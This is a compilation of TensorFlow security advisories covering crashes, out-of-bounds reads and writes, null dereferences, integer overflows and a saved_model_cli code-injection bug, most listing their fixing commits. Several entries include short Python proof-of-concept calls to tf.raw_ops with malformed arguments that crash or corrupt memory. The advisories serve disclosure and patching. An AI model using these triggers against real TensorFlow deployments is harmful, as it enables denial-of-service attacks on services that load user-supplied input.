TensorFlow is an open source platform for machine learning. When Conv2DBackpropInput receives empty out_backprop inputs (e.g. [3, 1, 0, 1]), the current CPU/GPU kernels CHECK fail (one with dnnl, the other with cudnn). This can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 27a65a43cf763897fecfa5cdb5cc653fc5dd0346. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The AvgPoolOp function takes an argument ksize that must be positive but is not checked. A negative ksize can trigger a CHECK failure and crash the program. We have patched the issue in GitHub commit 3a6ac52664c6c095aa2b114e742b0aa17fdce78f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If tf.sparse.cross receives an input separator that is not a scalar, it gives a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 83dcb4dbfa094e33db084e97c4d0531a559e0ebf. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If FakeQuantWithMinMaxVarsPerChannel is given min or max tensors of a rank other than one, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When TensorListFromTensor receives an element_shape of a rank greater than one, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 3db59a042a38f4338aa207922fa2f476e000a6ee. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If Save or SaveSlices is run over tensors of an unsupported dtype, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Reachable Assertion

TensorFlow is an open source platform for machine learning. When Unbatch receives a nonscalar input id, it gives a CHECK fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 4419d10d576adefa36b0e0a9425d2569f7c0189f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. …

Reachable Assertion

TensorFlow is an open source platform for machine learning. DenseBincount assumes its input tensor weights to either have the same shape as its input tensor input or to be length-0. A different weights shape will trigger a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bf4c14353c2328636a18bfad1e151052c81d5f43. The fix will be included in TensorFlow 2.10.0. We will also …
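
For illustration, a sketch of the weights shape mismatch described above (values are placeholders):

    import tensorflow as tf

    tf.raw_ops.DenseBincount(input=tf.constant([0, 1, 2, 3], dtype=tf.int32),
                             size=tf.constant(4, dtype=tf.int32),
                             weights=tf.constant([1.0, 2.0]))   # not the input's shape, not length-0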

Reachable Assertion

TensorFlow is an open source platform for machine learning. The implementation of SobolSampleOp is vulnerable to a denial of service via CHECK-failure (assertion failure) caused by assuming input(0), input(1), and input(2) to be scalar. This issue has been patched in GitHub commit c65c67f88ad770662e8f191269a907bf2b94b1bf. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If LRNGrad is given an output_image input tensor that is not 4-D, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bd90b3efab4ec958b228cd7cfe9125be1c0cf255. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Reachable Assertion

TensorFlow is an open source platform for machine learning. If FakeQuantWithMinMaxVars is given min or max tensors of a nonzero rank, it results in a CHECK fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Reachable Assertion

TensorFlow is an open source platform for machine learning. The implementation of FractionalAvgPoolGrad does not fully validate the input orig_input_tensor_shape. This results in an overflow that leads to a CHECK failure which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 03a659d7be9a1154fdf5eeac221e5950fec07dad. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, …

Out-of-bounds Write

TensorFlow is an open source platform for machine learning. The ScatterNd function takes an input argument that determines the indices of the output tensor. An input index greater than the size of the output tensor or less than zero will either write content at the wrong index or trigger a crash. We have patched the issue in GitHub commit b4d4b4cb019bd7240a52daa4ba61e3cc814f0384. The fix will be included in TensorFlow 2.10.0. We will also cherrypick …
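
For illustration, a sketch of a call with an index outside the output shape (shapes and values are placeholders):

    import tensorflow as tf

    tf.raw_ops.ScatterNd(indices=tf.constant([[10]]),            # beyond the length-4 output below
                         updates=tf.constant([1.0]),
                         shape=tf.constant([4], dtype=tf.int32))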

Out-of-bounds Read

TensorFlow is an open source platform for machine learning. The GatherNd function takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read is triggered. This issue has been patched in GitHub commit 595a65a3e224a0362d7e68c2213acfc2b499a196. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow …
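
For illustration, a sketch of an index that reaches past the end of the input (values are placeholders):

    import tensorflow as tf

    tf.raw_ops.GatherNd(params=tf.constant([1.0, 2.0, 3.0]),
                        indices=tf.constant([[7]]))   # out-of-range index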

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. When mlir::tfg::GraphDefImporter::ConvertNodeDef tries to convert NodeDefs without an op name, it crashes. We have patched the issue in GitHub commit a0f0b9a21c9270930457095092f558fbad4c03e5. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. When mlir::tfg::ConvertGenericFunctionToFunctionDef is given empty function attributes, it gives a null dereference. We have patched the issue in GitHub commit 1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. When mlir::tfg::TFOp::nameAttr receives null type list attributes, it crashes. We have patched the issue in GitHub commits 3a754740d5414e362512ee981eefba41561a63a6 and a0f0b9a21c9270930457095092f558fbad4c03e5. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. If LowerBound or UpperBound is given an empty sorted_inputs input, it results in a nullptr dereference, leading to a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bce3717eaef4f769019fd18e990464ca4a2efeea. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, …

Integer Overflow or Wraparound

TensorFlow is an open source platform for machine learning. When RangeSize receives values that do not fit into an int64_t, it crashes. We have patched the issue in GitHub commit 37e64539cd29fcfb814c4451152a60f5d107b0f0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this …

Integer Overflow or Wraparound

TensorFlow is an open source platform for machine learning. The RaggedRangeOp function takes an argument limits that is eventually used to construct a TensorShape as an int64. If limits is a very large float, it can overflow when converted to an int64. This triggers an InvalidArgument but also throws an abort signal that crashes the program. We have patched the issue in GitHub commit 37cefa91bee4eace55715eeef43720b958a01192. The fix will be included …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedBiasAdd is given min_input, max_input, min_bias, max_bias tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedRelu or QuantizedRelu6 are given nonscalar inputs for min_features or max_features, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Improper Input Validation

TensorFlow is an open source platform for machine learning. When converting transposed convolutions using per-channel weight quantization the converter segfaults and crashes the Python process. We have patched the issue in GitHub commit aa0b852a4588cea4d36b74feb05d93055540b450. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If Requantize is given input_min, input_max, requested_output_min, requested_output_max tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedAdd is given min_input or max_input tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If SparseBincount is given inputs for indices, values, and dense_shape that do not make a valid sparse tensor, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 40adbe4dd15b582b0210dfbf40c243a62f5119fa. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizeDownAndShrinkRange is given nonscalar inputs for input_min or input_max, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 73ad1815ebcfeb7c051f9c2f7ab5024380ca8613. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedAvgPool is given min_input or max_input tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 7cdf9d4d2083b739ec81cfdace546b0c99f50622. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedMatMul is given nonscalar input for min_a, max_a, min_b, or max_b, it gives a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit aca766ac7693bf29ed0df55ad6bfcc78f35e7f48. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Improper Input Validation

TensorFlow is an open source platform for machine learning. If QuantizedInstanceNorm is given x_min or x_max tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these …

Improper Input Validation

TensorFlow is an open source platform for machine learning. The implementation of BlockLSTMGradV2 does not fully validate its inputs. This results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 2a458fc4866505be27c62f81474ecb2b870498fa. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are …

Divide By Zero

TensorFlow is an open source platform for machine learning. If Conv2D is given empty input and the filter and padding sizes are valid, the output is all-zeros. This causes division-by-zero floating point exceptions that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 611d80db29dd7b0cfb755772c69d60ae5bca05f9. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, …
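
For illustration, a sketch of a convolution over an empty input with otherwise valid filter and padding (shapes are placeholders, not the reporter's proof of concept):

    import tensorflow as tf

    tf.raw_ops.Conv2D(input=tf.zeros([0, 4, 4, 1]),    # empty (zero-sized) input
                      filter=tf.zeros([2, 2, 1, 1]),
                      strides=[1, 1, 1, 1],
                      padding="SAME")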

Use of Uninitialized Resource

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, there is a potential for segfault / denial of service in TensorFlow by calling tf.compat.v1.* ops which don't yet have support for quantized types, which was added after migration to TensorFlow 2.x. In these scenarios, since the kernel is missing, a nullptr value is passed to ParseDimensionValue for the py_value argument. Then, this …

Undefined Behavior for Input to API

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, multiple TensorFlow operations misbehave in eager mode when the resource handle provided to them is invalid. In graph mode, it would have been impossible to perform these API calls, but migration to TF 2.x eager mode opened up this vulnerability. If the resource handle is empty, then a reference is bound to a …

Uncontrolled Resource Consumption

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.ragged.constant does not fully validate the input arguments. This results in a denial of service by consuming all available memory. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Out-of-bounds Write

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.EditDistance has incomplete validation. Users can pass negative values to cause a segmentation fault based denial of service. In multiple places throughout the code, one may compute an index for a write operation. However, the existing validation only checks against the upper bound of the array. Hence, it is possible …

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.SparseTensorDenseAdd does not fully validate the input arguments. In this case, a reference gets bound to a nullptr during kernel execution. This is undefined behavior. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

NULL Pointer Dereference

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.QuantizedConv2D does not fully validate the input arguments. In this case, references get bound to nullptr for each argument that is empty. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Missing validation causes denial of service via `UnsortedSegmentJoin`

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.UnsortedSegmentJoin does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes num_segments is a scalar but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a …

Missing validation causes denial of service via `Conv3DBackpropFilterV2`

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.UnsortedSegmentJoin does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes num_segments is a positive scalar but there is no validation. Since this value is used to allocate the output tensor, a negative value …

Integer Overflow or Wraparound

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.SpaceToBatchND (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow: The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a CHECK-failure (assertion failure), as in TFSA-2021-198. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.histogram_fixed_width is vulnerable to a crash when the values array contain Not a Number (NaN) elements. The implementation assumes that all floating point operations are defined and then converts a floating point result to an integer index. If values contains NaN then the result of the division is still NaN …
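
For illustration, a minimal call whose values contain a NaN element, the condition described above:

    import tensorflow as tf

    values = tf.constant([1.0, float("nan"), 2.0])
    tf.histogram_fixed_width(values, value_range=[0.0, 10.0], nbins=5)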

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.Conv3DBackpropFilterV2 does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code does not validate that the filter_sizes argument is a vector. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.LoadAndRemapMatrix does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes initializing_values is a vector but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.GetSessionTensor does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.LSTMBlockCell does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code does not validate the ranks of any of the arguments to this API call. This results in CHECK-failures when the elements of the tensor …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, certain TFLite models that were created using TFLite model converter would crash when loaded in the TFLite interpreter. The culprit is that during quantization the scale of values could be greater than 1 but code was always assuming sub-unit scaling. Thus, since code was calling QuantizeMultiplierSmallerThanOneExp, the TFLITE_CHECK_LT assertion would trigger and abort …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.SparseTensorToCSRSparseMatrix does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes dense_shape is a vector and indices is a matrix (as part of requirements for sparse tensors) but there is no validation for this. …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the tf.compat.v1.signal.rfft2d and tf.compat.v1.signal.rfft3d lack input validation and under certain conditions can result in crashes (due to CHECK-failures). Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.StagePeek does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. The code assumes index is a scalar but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a …

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.QuantizeAndDequantizeV4Grad does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.TensorSummaryV2 does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Input Validation

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of tf.raw_ops.DeleteSessionTensor does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Improper Control of Generation of Code ('Code Injection')

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow's saved_model_cli tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this …

Heap-based Buffer Overflow

TensorFlow is an open source platform for machine learning. In version 2.8.0, the TensorKey hash function used total estimated AllocatedBytes(), which (a) is an estimate per tensor, and (b) is a very poor hash function for constants (e.g. int32_t). It also tried to access individual tensor bytes through tensor.data() of size AllocatedBytes(). This led to ASAN failures because the AllocatedBytes() is an estimate of total bytes allocated by a tensor, …

Access of Resource Using Incompatible Type ('Type Confusion')

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the macros that TensorFlow uses for writing assertions (e.g., CHECK_LT, CHECK_GT, etc.) have an incorrect logic when comparing size_t and int values. Due to type conversion rules, several of the macros would trigger incorrectly. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

Incomplete validation in `SparseSparseMinimum`

Incomplete validation in SparseSparseMinimum results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.ones([45, 92], dtype=tf.int64) a_values = tf.ones([45], dtype=tf.int64) a_shape = tf.ones([1], dtype=tf.int64) b_indices = tf.ones([1, 1], dtype=tf.int64) b_values = tf.ones([1], dtype=tf.int64) b_shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSparseMinimum(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape)

Type confusion leading to segfault in Tensorflow

The implementation of shape inference for ConcatV2 can be used to trigger a denial of service attack via a segfault caused by a type confusion: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.ConcatV2( values=[[1,2,3],[4,5,6]], axis = 0xb500005b) return y test() The axis argument is translated into concat_dim in the ConcatShapeHelper helper function. Then, a value for min_rank is computed based on concat_dim. This is then used to validate …

Null-dereference in Tensorflow

The implementation of GetInitOp is vulnerable to a crash caused by dereferencing a null pointer: const auto& init_op_sig_it = meta_graph_def.signature_def().find(kSavedModelInitOpSignatureKey); if (init_op_sig_it != sig_def_map.end()) { *init_op_name = init_op_sig_it->second.outputs() .find(kSavedModelInitOpSignatureKey) ->second.name(); return Status::OK(); } Here, we have a nested map and we assume that if the first .find succeeds then so would the search in the internal map. However, the maps are built based on the SavedModel protobuf format and …

Memory leak in Tensorflow

If a graph node is invalid, TensorFlow can leak memory in the implementation of ImmutableExecutorState::Initialize: Status s = params_.create_kernel(n->properties(), &item->kernel); if (!s.ok()) { item->kernel = nullptr; s = AttachDef(s, n); return s; } Here, we set item->kernel to nullptr but it is a simple OpKernel pointer so the memory that was previously allocated to it would leak.

Memory exhaustion in Tensorflow

The implementation of StringNGrams can be used to trigger a denial of service attack by causing an OOM condition after an integer overflow: import tensorflow as tf tf.raw_ops.StringNGrams( data=['123456'], data_splits=[0,1], separator='a'*15, ngram_widths=[], left_pad='', right_pad='', pad_width=-5, preserve_short_sequences=True) We are missing a validation on pad_width and that results in computing a negative value for ngram_width which is later used to allocate parts of the output.

Memory exhaustion in Tensorflow

The implementation of ThreadPoolHandle can be used to trigger a denial of service attack by allocating too much memory: import tensorflow as tf y = tf.raw_ops.ThreadPoolHandle(num_threads=0x60000000,display_name='tf') This is because the num_threads argument is only checked to not be negative, but there is no upper bound on its value.

Integer overflow in Tensorflow

The implementation of OpLevelCostEstimator::CalculateOutputSize is vulnerable to an integer overflow if an attacker can create an operation which would involve tensors with large enough number of elements: for (const auto& dim : output_shape.dim()) { output_size *= dim.size(); } Here, we can have a large enough number of dimensions in output_shape.dim() or just a small number of dimensions being large enough to cause an overflow in the multiplication.

Integer overflow in Tensorflow

The implementation of OpLevelCostEstimator::CalculateTensorSize is vulnerable to an integer overflow if an attacker can create an operation which would involve a tensor with large enough number of elements: int64_t OpLevelCostEstimator::CalculateTensorSize( const OpInfo::TensorProperties& tensor, bool* found_unknown_shapes) { int64_t count = CalculateTensorElementCount(tensor, found_unknown_shapes); int size = DataTypeSize(BaseType(tensor.dtype())); VLOG(2) << "Count: " << count << " DataTypeSize: " << size; return count * size; } Here, count and size can be large enough …

Division by zero in Tensorflow

The implementation of FractionalMaxPool can be made to crash a TensorFlow process via a division by 0: import tensorflow as tf import numpy as np tf.raw_ops.FractionalMaxPool( value=tf.constant(value=[[[[1, 4, 2, 3]]]], dtype=tf.int64), pooling_ratio=[1.0, 1.44, 1.73, 1.0], pseudo_random=False, overlapping=False, deterministic=False, seed=0, seed2=0, name=None)

Division by zero in Tensorflow

The estimator for the cost of some convolution operations can be made to execute a division by 0: import tensorflow as tf @tf.function def test(): y=tf.raw_ops.AvgPoolGrad( orig_input_shape=[1,1,1,1], grad=[[[[1.0],[1.0],[1.0]]],[[[2.0],[2.0],[2.0]]],[[[3.0],[3.0],[3.0]]]], ksize=[1,1,1,1], strides=[1,1,1,0], padding='VALID', data_format='NCHW') return y test() The function fails to check that the stride argument is strictly positive: int64_t GetOutputSize(const int64_t input, const int64_t filter, const int64_t stride, const Padding& padding) { // Logic for calculating output shape is from GetWindowedOutputSizeVerbose() …

`CHECK`-failures in Tensorflow

The implementation of MapStage is vulnerable to a CHECK-fail if the key tensor is not a scalar: import tensorflow as tf import numpy as np tf.raw_ops.MapStage( key = tf.constant(value=[4], shape=(1,2), dtype=tf.int64), indices = np.array([[6]]), values = np.array([-60]), dtypes = [tf.int64], capacity=0, memory_limit=0, container='', shared_name='', name=None )

`CHECK`-failures in binary ops in Tensorflow

A malicious user can cause a denial of service by altering a SavedModel such that any binary op would trigger CHECK failures. This occurs when the protobuf part corresponding to the tensor arguments is modified such that the dtype no longer matches the dtype expected by the op. In that case, calling the templated binary operator for the binary op would receive corrupted data, due to the type confusion involved: …

`CHECK`-failures in `TensorByteSize` in Tensorflow

A malicious user can cause a denial of service by altering a SavedModel such that TensorByteSize would trigger CHECK failures. int64_t TensorByteSize(const TensorProto& t) { // num_elements returns -1 if shape is not fully defined. int64_t num_elems = TensorShape(t.tensor_shape()).num_elements(); return num_elems < 0 ? -1 : num_elems * DataTypeSize(t.dtype()); } TensorShape constructor throws a CHECK-fail if shape is partial or has a number of elements that would overflow the size …

Use after free in `DecodePng` kernel

A malicious user can cause a use after free behavior when decoding PNG images: if (/* … error conditions … */) { png::CommonFreeDecode(&decode); OP_REQUIRES(context, false, errors::InvalidArgument("PNG size too large for int: ", decode.width, " by ", decode.height)); } After png::CommonFreeDecode(&decode) gets called, the values of decode.width and decode.height are in an unspecified state.

Uninitialized variable access in Tensorflow

The implementation of AssignOp can result in copying uninitialized data to a new tensor. This later results in undefined behavior. The implementation has a check that the left hand side of the assignment is initialized (to minimize the number of allocations), but does not check that the right hand side is also initialized.

Undefined behavior in `SparseTensorSliceDataset`

The implementation of SparseTensorSliceDataset has an undefined behavior: under certain conditions it can be made to dereference a nullptr value: import tensorflow as tf import numpy as np tf.raw_ops.SparseTensorSliceDataset( indices=[[]], values=[], dense_shape=[1,1]) The 3 input arguments represent a sparse tensor. However, there are some preconditions that these arguments must satisfy but these are not validated in the implementation.

Stack overflow in TensorFlow

The GraphDef format in TensorFlow does not allow self recursive functions. The runtime assumes that this invariant is satisfied. However, a GraphDef containing a fragment such as the following can be consumed when loading a SavedModel: library { function { signature { name: "SomeOp" description: "Self recursive op" } node_def { name: "1" op: "SomeOp" } node_def { name: "2" op: "SomeOp" } } } This would result in a …

Segfault in `simplifyBroadcast` in Tensorflow

The simplifyBroadcast function in the MLIR-TFRT infrastructure in TensorFlow is vulnerable to a segfault (hence, denial of service), if called with scalar shapes. size_t maxRank = 0; for (auto shape : llvm::enumerate(shapes)) { auto found_shape = analysis.dimensionsForShapeTensor(shape.value()); if (!found_shape) return {}; shapes_found.push_back(found_shape); maxRank = std::max(maxRank, found_shape->size()); } SmallVector<const ShapeComponentAnalysis::SymbolicDimension> joined_dimensions(maxRank); If all shapes are scalar, then maxRank is 0, so we build an empty SmallVector.

Reachable Assertion in Tensorflow

When decoding a tensor from protobuf, a TensorFlow process can encounter cases where a CHECK assertion is invalidated based on user controlled arguments, if the tensors have an invalid dtype and 0 elements or an invalid shape. This allows attackers to cause denial of services in TensorFlow processes.

